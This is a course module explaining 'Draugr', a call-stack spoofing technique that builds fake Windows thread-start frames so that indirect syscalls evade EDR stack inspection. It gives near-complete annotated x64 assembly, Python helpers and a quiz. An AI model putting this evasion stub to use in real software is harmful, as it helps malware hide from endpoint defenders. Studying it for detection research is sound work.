Difficulty: Advanced

Module 6: Synthetic Frame Construction

Building a three-layer fake stack that survives full unwinding — one precise sub rsp at a time.

Module Overview

This is the core of Draugr. The Spoof assembly routine constructs a three-layer synthetic stack beneath the current execution point. Each layer represents a fake call frame for a legitimate Windows function. When the syscall executes and an EDR walks the stack, it sees: the current function called through BaseThreadInitThunk, which was called by RtlUserThreadStart — exactly what every normal thread looks like. This module walks through each layer, byte by byte.

The Three-Layer Stack Layout

The synthetic stack is constructed from the bottom up (highest address to lowest). The final RSP after construction points to the very top — the gadget address that will be popped by RET after the syscall returns.

Complete Synthetic Stack (Top to Bottom)

[Top of stack: lowest address, RSP points here]
  Gadget address              JMP [RBX]          ← RSP at syscall time
  BaseThreadInitThunk+0x14    frame              size calculated from UNWIND_CODEs
  RtlUserThreadStart+0x21     frame              size calculated from UNWIND_CODEs
  0x200 bytes                 reserved buffer    512 bytes of padding
  NULL terminator (0x0)                          stops stack walkers
[Bottom of stack: highest address]

Construction Order

The stack grows downward on x64 (lower addresses = newer frames). Draugr builds from the bottom up:

  1. NULL terminator — pushed first (highest address)
  2. 0x200 buffer — RSP decremented by 512 bytes
  3. RtlUserThreadStart frame — RSP decremented by calculated frame size
  4. BaseThreadInitThunk frame — RSP decremented by calculated frame size
  5. Gadget address — pushed last (lowest address, top of stack)
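
The construction order above can be modelled as plain address arithmetic. The following is a small Python sketch, not part of Draugr: the function name, the starting RSP, and the two frame sizes are hypothetical values chosen only for illustration.

```python
BUFFER_SIZE = 0x200  # reserved buffer from step 2
SLOT = 8             # one 64-bit stack slot


def synthetic_layout(rsp, ruts_size, btit_size):
    """Return the address of each element, in construction order.

    ruts_size / btit_size are hypothetical frame sizes; the real values
    come from each function's UNWIND_CODEs.
    """
    layout = {}
    rsp -= SLOT                          # step 1: push NULL terminator
    layout["null_terminator"] = rsp
    rsp -= BUFFER_SIZE                   # step 2: reserve the buffer
    layout["buffer"] = rsp
    rsp -= ruts_size                     # step 3: RtlUserThreadStart frame
    layout["RtlUserThreadStart_ret"] = rsp
    rsp -= btit_size                     # step 4: BaseThreadInitThunk frame
    layout["BaseThreadInitThunk_ret"] = rsp
    rsp -= SLOT                          # step 5: push gadget address
    layout["gadget"] = rsp
    return layout


layout = synthetic_layout(0x7FF000, ruts_size=0x50, btit_size=0x30)
for name, addr in layout.items():
    print(f"{addr:#x}  {name}")
```

Each step only lowers RSP, so the element created last (the gadget) always ends up at the lowest address.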

Layer 1: The Reserved Buffer (0x200 Bytes)

The first allocation after the NULL terminator is a 512-byte reserved buffer at the base of the synthetic stack.

ASM - Buffer allocation
    ; Push NULL terminator first (base of stack)
    xor   rax, rax
    push  rax                  ; [rsp] = 0x0 (NULL)

    ; Allocate 0x200 bytes of buffer space
    sub   rsp, 0x200           ; RSP -= 512

Purpose of the Buffer

This 512-byte region provides working space and separation between the NULL terminator and the synthetic frames. Some stack-walking implementations may read memory beyond the oldest frame (toward higher addresses). The buffer ensures these reads hit mapped stack memory rather than unmapped pages; note that sub rsp only reserves the region and does not zero it. It also provides padding and prevents the synthetic frames from being immediately adjacent to the stack terminator, which could look suspicious under heuristic analysis.

Layer 2: RtlUserThreadStart Frame

The second layer creates a fake frame for ntdll!RtlUserThreadStart. This is the function that Windows calls to start every user-mode thread. Its frame sits at the bottom of every legitimate call stack.

ASM - RtlUserThreadStart synthetic frame
    ; Load RtlUserThreadStart frame size from PRM
    mov   r12, [rbx + 0x48]    ; R12 = RtlUserThreadStart_Size

    ; Allocate the frame
    sub   rsp, r12             ; RSP -= frame size

    ; Write the fake return address at the top of this frame
    mov   r13, [rbx + 0x58]    ; R13 = RtlUserThreadStart + 0x21
    mov   [rsp], r13           ; [RSP] = fake return address

What This Creates

After this code executes, the stack contains a frame that is exactly the size that Windows expects for RtlUserThreadStart. At the top of this frame (lowest address) sits the return address RtlUserThreadStart+0x21. When the stack unwinder processes this frame, it reads the return address, looks up the RUNTIME_FUNCTION for that address, and uses the UNWIND_CODEs to determine how many bytes to skip. Because Draugr calculated the same size from the same UNWIND_CODEs, the unwinder advances by exactly the allocated amount and reads its next return address from the slot just past the frame. The walk ends cleanly only if that slot reads as 0x0, the expected end of the stack.
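
To make "calculated from UNWIND_CODEs" concrete, here is a hedged Python sketch of how a frame size can be derived from a raw UNWIND_CODE array. It assumes the stored size is the sum of the prologue's stack allocations plus 8 bytes for the return-address slot, which is what the sub rsp / mov [rsp] pattern above requires for consecutive return addresses to line up. The function name is hypothetical, and only the common operations are handled; frame-pointer and machine-frame functions are rejected rather than guessed at.

```python
import struct

UWOP_PUSH_NONVOL = 0
UWOP_ALLOC_LARGE = 1
UWOP_ALLOC_SMALL = 2
UWOP_SAVE_NONVOL = 4
UWOP_SAVE_NONVOL_FAR = 5
UWOP_SAVE_XMM128 = 8
UWOP_SAVE_XMM128_FAR = 9


def frame_size(unwind_codes: bytes) -> int:
    """Sum the stack allocations described by a raw UNWIND_CODE array."""
    slots = struct.unpack(f"<{len(unwind_codes) // 2}H", unwind_codes)
    size = 8  # return-address slot (assumed to be part of the stored size)
    i = 0
    while i < len(slots):
        op = (slots[i] >> 8) & 0x0F     # UnwindOp: low nibble of byte 1
        info = (slots[i] >> 12) & 0x0F  # OpInfo: high nibble of byte 1
        if op == UWOP_PUSH_NONVOL:
            size += 8
            i += 1
        elif op == UWOP_ALLOC_SMALL:
            size += info * 8 + 8
            i += 1
        elif op == UWOP_ALLOC_LARGE and info == 0:
            size += slots[i + 1] * 8    # next slot holds size / 8
            i += 2
        elif op == UWOP_ALLOC_LARGE:
            size += slots[i + 1] | (slots[i + 2] << 16)  # unscaled 32-bit size
            i += 3
        elif op in (UWOP_SAVE_NONVOL, UWOP_SAVE_XMM128):
            i += 2                      # register saves do not move RSP
        elif op in (UWOP_SAVE_NONVOL_FAR, UWOP_SAVE_XMM128_FAR):
            i += 3
        else:
            raise ValueError(f"unsupported unwind op {op}")
    return size


# Codes for a prologue of "push rbx; sub rsp, 0x20" (listed in reverse order)
codes = bytes([0x06, 0x32, 0x02, 0x30])
print(hex(frame_size(codes)))
```

For this example prologue the result is 0x20 (allocation) + 8 (pushed RBX) + 8 (return address) = 0x30.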

Layer 3: BaseThreadInitThunk Frame

On top of the RtlUserThreadStart frame, Draugr builds the kernel32!BaseThreadInitThunk frame. In a real thread, this function is called by RtlUserThreadStart and in turn calls the thread's entry point.

ASM - BaseThreadInitThunk synthetic frame
    ; Load BaseThreadInitThunk frame size from PRM
    mov   r14, [rbx + 0x40]    ; R14 = BaseThreadInitThunk_Size

    ; Allocate the frame
    sub   rsp, r14             ; RSP -= frame size

    ; Write the fake return address at the top of this frame
    mov   r15, [rbx + 0x50]    ; R15 = BaseThreadInitThunk + 0x14
    mov   [rsp], r15           ; [RSP] = fake return address

Frame Chain

Now the stack unwinder sees a chain: the current frame's return address is BaseThreadInitThunk+0x14. Unwinding that frame (by its UNWIND_CODEs) reveals a return address of RtlUserThreadStart+0x21. Unwinding that frame reveals the NULL terminator. For a walker that checks only return addresses and UNWIND_CODE-derived frame sizes, this matches the base of a real thread's stack, so the synthetic chain cannot be told apart from a genuine one on that basis alone.

Unwinder's View of the Synthetic Stack

  Current Frame          ret = BaseThreadInitThunk+0x14
  BaseThreadInitThunk    ret = RtlUserThreadStart+0x21
  RtlUserThreadStart     ret = 0x0 (NULL)
  STOP                   NULL = end of stack
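
The chain can be checked with a toy walker. This Python sketch is an illustration only: the return addresses are made-up stand-ins, the size table stands in for the RUNTIME_FUNCTION and UNWIND_CODE lookup, and the model places the terminating 0x0 in the slot directly past the RtlUserThreadStart frame, as the chain described here assumes.

```python
BTIT_RET = 0x7FFB00001014  # stand-in for BaseThreadInitThunk+0x14
RUTS_RET = 0x7FFB00002021  # stand-in for RtlUserThreadStart+0x21

# Stand-in for the unwinder's per-function frame-size lookup
# (hypothetical sizes, each including the return-address slot)
FRAME_SIZES = {BTIT_RET: 0x30, RUTS_RET: 0x50}


def build_stack(top, sizes):
    """Place the two fake return addresses and the terminator in memory."""
    memory = {top: BTIT_RET}
    memory[top + sizes[BTIT_RET]] = RUTS_RET
    memory[top + sizes[BTIT_RET] + sizes[RUTS_RET]] = 0
    return memory


def walk(memory, rsp, sizes):
    """Follow return addresses until a 0x0 slot is read."""
    chain = []
    while True:
        ret = memory[rsp]  # KeyError models a read of an unprepared slot
        if ret == 0:
            return chain
        chain.append(ret)
        rsp += sizes[ret]  # skip the frame the unwinder believes is there


memory = build_stack(0x1000, FRAME_SIZES)
print([hex(r) for r in walk(memory, 0x1000, FRAME_SIZES)])
```

If the stack is built with a size that differs from the one the walker looks up, the second read lands on a slot that was never prepared, which is the failure mode the exact-size requirement avoids.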

The Gadget Frame

The final element placed on the stack is the gadget address. This sits at the very top of the synthetic stack (the lowest address). When the syscall returns, the CPU's RET instruction pops this address into RIP.

ASM - Pushing the gadget
    ; Load gadget address from PRM
    mov   rax, [rbx + 0x60]    ; RAX = gadget address (JMP [RBX])

    ; Push it as the return address for the syscall
    push  rax                  ; [RSP] = gadget address

Critical Ordering

The gadget address must be the last thing pushed. RSP points to it at the time the syscall instruction executes. When the syscall returns, RET pops the top of the stack into RIP. If the gadget is not at the top, the CPU would jump to the wrong address — either a fake return address or garbage — and crash immediately.

The NULL Terminator

A zero value (0x0) is placed at the very bottom of the synthetic stack, at a higher address than the 0x200 buffer. It serves as the stack-walk terminator.

Why NULL Stops the Walk

Windows stack walking functions like RtlWalkFrameChain and RtlCaptureStackBackTrace iterate through frames by following return addresses. When they encounter a return address of 0x0, they interpret it as the end of the stack and stop. Without this terminator, the walker would continue past the synthetic frames into uncontrolled memory — either reading garbage that exposes the spoof, or causing an access violation.

Real Threads Have This Too

On a genuine Windows thread, the bottom of the stack also terminates with a NULL return address. The OS sets this up when it creates the thread's stack. Draugr replicates this behavior exactly, so even the termination condition is indistinguishable from a real stack.

Stack Argument Copying

The x64 Windows calling convention passes the first four arguments in registers (RCX, RDX, R8, R9). Arguments 5 and beyond are passed on the stack. When Draugr replaces the real stack with the synthetic one, any stack-based arguments must be copied to the correct positions in the new stack.

ASM - Stack argument copying (for >4 argument syscalls)
    ; The PRM contains all arguments at offset 0x78+
    ; Arguments 1-4 go in registers (handled separately)
    ; Arguments 5+ must be placed on the stack at [RSP+0x28], [RSP+0x30], etc.

    ; Register arguments, shown for reference; the final loads happen
    ; just before the jump to the syscall instruction
    mov   rcx, [rbx + 0x78]    ; arg1 (must end up in R10 for the syscall)
    mov   rdx, [rbx + 0x80]    ; arg2 (goes in RDX)
    mov   r8,  [rbx + 0x88]    ; arg3 (goes in R8)
    mov   r9,  [rbx + 0x90]    ; arg4 (goes in R9)

    ; Copy stack arguments (arg5, arg6, ...) to the synthetic stack
    ; Stack slots at [RSP+0x28], [RSP+0x30], [RSP+0x38], ...
    mov   rax, [rbx + 0x98]    ; arg5
    mov   [rsp + 0x28], rax
    mov   rax, [rbx + 0xA0]    ; arg6
    mov   [rsp + 0x30], rax
    ; ... additional arguments as needed

Why 0x28 and Not 0x20?

The x64 calling convention reserves 32 bytes (0x20) of shadow space on the stack above the return address. Arguments 5+ start at [RSP + 0x28] (shadow space + 8 bytes for the return address). Draugr must respect this layout exactly, or the kernel function will read the wrong values for parameters 5 and beyond. Functions like NtAllocateVirtualMemory take 6 arguments, so getting this right is critical.
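
The slot arithmetic can be written out in a few lines. This Python sketch is illustrative only, with a hypothetical helper name; it assumes RSP points at the return-address slot, as it does when the syscall instruction executes.

```python
RETURN_SLOT = 8      # return address at [RSP]
SHADOW_SPACE = 0x20  # home space for the four register arguments


def stack_arg_offset(n):
    """Offset from RSP of the n-th argument (n >= 5)."""
    if n < 5:
        raise ValueError("arguments 1-4 are passed in registers")
    return RETURN_SLOT + SHADOW_SPACE + 8 * (n - 5)


for n in (5, 6):
    print(f"arg{n} -> [RSP + {stack_arg_offset(n):#x}]")
```

This reproduces the offsets used in the listing above: 0x28 for the fifth argument and 0x30 for the sixth.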

Assembly Walkthrough: Complete Construction

Here is the full sequence from the Spoof routine that builds the synthetic stack, loads register arguments, and jumps to the syscall instruction. Read top to bottom — each instruction is annotated with its purpose.

ASM - Stub.s: Synthetic Stack Construction
    ; ---- Save original state ----
    mov   rbx, rcx             ; RBX = &PRM (anchor pointer)
    mov   rax, [rsp]           ; Save original return address
    mov   [rbx + 0x08], rax    ; PRM.OG_retaddr = original return

    ; ---- Save non-volatile registers ----
    mov   [rbx + 0x10], rdi
    mov   [rbx + 0x18], rsi
    mov   [rbx + 0x20], r12
    mov   [rbx + 0x28], r13
    mov   [rbx + 0x30], r14
    mov   [rbx + 0x38], r15

    ; ---- Layer 0: NULL terminator ----
    xor   rax, rax
    push  rax                  ; Stack bottom = 0x0

    ; ---- Layer 1: Reserved buffer ----
    sub   rsp, 0x200           ; 512 bytes of padding

    ; ---- Layer 2: RtlUserThreadStart frame ----
    mov   r12, [rbx + 0x48]   ; R12 = RtlUserThreadStart frame size
    sub   rsp, r12             ; Allocate frame
    mov   r13, [rbx + 0x58]   ; R13 = RtlUserThreadStart + 0x21
    mov   [rsp], r13           ; Write fake return address

    ; ---- Layer 3: BaseThreadInitThunk frame ----
    mov   r14, [rbx + 0x40]   ; R14 = BaseThreadInitThunk frame size
    sub   rsp, r14             ; Allocate frame
    mov   r15, [rbx + 0x50]   ; R15 = BaseThreadInitThunk + 0x14
    mov   [rsp], r15           ; Write fake return address

    ; ---- Gadget: top of stack ----
    mov   rax, [rbx + 0x60]   ; RAX = gadget address (JMP [RBX])
    push  rax                  ; RSP now points to gadget

    ; ---- Load syscall arguments into registers ----
    mov   r10, [rbx + 0x78]   ; R10 = arg1 (R10, not RCX for syscall)
    mov   rdx, [rbx + 0x80]   ; RDX = arg2
    mov   r8,  [rbx + 0x88]   ; R8  = arg3
    mov   r9,  [rbx + 0x90]   ; R9  = arg4

    ; ---- Load SSN and jump to syscall ----
    mov   rax, [rbx + 0x68]   ; RAX = System Service Number
    mov   r11, [rbx + 0x70]   ; R11 = syscall instruction address
    jmp   r11                  ; Jump to: syscall; ret in ntdll
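
The PRM offsets used throughout this listing can be collected into a single layout and checked mechanically. The Python sketch below uses ctypes only as an offset calculator. All field names are hypothetical, the field at offset 0x00 is inferred from the JMP [RBX] gadget (which dereferences the PRM pointer itself), and the length of the argument array is an arbitrary assumption.

```python
import ctypes

U64 = ctypes.c_uint64
MAX_ARGS = 12  # hypothetical; the source only says arguments start at 0x78


class PRM(ctypes.Structure):
    _fields_ = [
        ("jmp_target",   U64),  # 0x00: inferred target of JMP [RBX]
        ("og_retaddr",   U64),  # 0x08: original return address
        ("saved_rdi",    U64),  # 0x10
        ("saved_rsi",    U64),  # 0x18
        ("saved_r12",    U64),  # 0x20
        ("saved_r13",    U64),  # 0x28
        ("saved_r14",    U64),  # 0x30
        ("saved_r15",    U64),  # 0x38
        ("btit_size",    U64),  # 0x40: BaseThreadInitThunk frame size
        ("ruts_size",    U64),  # 0x48: RtlUserThreadStart frame size
        ("btit_ret",     U64),  # 0x50: BaseThreadInitThunk + 0x14
        ("ruts_ret",     U64),  # 0x58: RtlUserThreadStart + 0x21
        ("gadget",       U64),  # 0x60: address of a JMP [RBX] gadget
        ("ssn",          U64),  # 0x68: System Service Number
        ("syscall_addr", U64),  # 0x70: address of syscall; ret in ntdll
        ("args",         U64 * MAX_ARGS),  # 0x78+: arg1, arg2, ...
    ]


for name, _ in PRM._fields_:
    print(f"{getattr(PRM, name).offset:#04x}  {name}")
```

Printing the offsets gives a quick way to confirm that every [rbx + N] operand in the listing refers to the field its comment names.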

Why R10 Instead of RCX?

In the Windows syscall convention, the kernel expects the first argument in R10, not RCX, because the syscall instruction overwrites RCX with the address of the following instruction (and R11 with RFLAGS). The standard ntdll stub therefore executes mov r10, rcx before the syscall. Since Draugr jumps directly to the syscall instruction, bypassing the stub preamble, it must place the first argument in R10 itself. The same clobbering is why R11 is a safe scratch register for the jump target.

Why JMP Instead of CALL?

The Spoof routine uses jmp r11 (not call r11) to reach the syscall instruction. A CALL would push an additional return address onto the stack, shifting the carefully constructed synthetic stack by 8 bytes: the RET after the syscall would then return into the Spoof routine instead of the gadget, and a stack walker would see that extra address at the top of the chain. The JMP transfers control without modifying RSP. The syscall instruction in ntdll is followed by RET, which pops the gadget address from RSP, exactly as intended.

Module 6 Quiz: Synthetic Frame Construction

Q1: In what order are the synthetic stack layers constructed (first pushed to last pushed)?

The stack grows downward, so the first item pushed ends up at the highest address (bottom). NULL is pushed first, then the buffer is allocated, then the RtlUserThreadStart frame, then the BaseThreadInitThunk frame, and finally the gadget address is pushed on top. RSP points to the gadget at syscall time.

Q2: What is the purpose of the NULL terminator at the bottom of the synthetic stack?

Functions like RtlWalkFrameChain treat a NULL return address as the end of the call chain. Without it, the walker would continue into whatever memory lies beyond the synthetic stack, either producing garbage frames that expose the spoof or causing an access violation.

Q3: Why must each synthetic frame be exactly the size calculated from the target function's UNWIND_CODEs?

The stack unwinder reads the UNWIND_CODEs for each function and uses them to calculate how many bytes to advance RSP to reach the previous frame. If a synthetic frame is the wrong size, the unwinder will land at the wrong position, reading garbage as the next return address. The frame sizes must match exactly so the unwinder walks cleanly from frame to frame.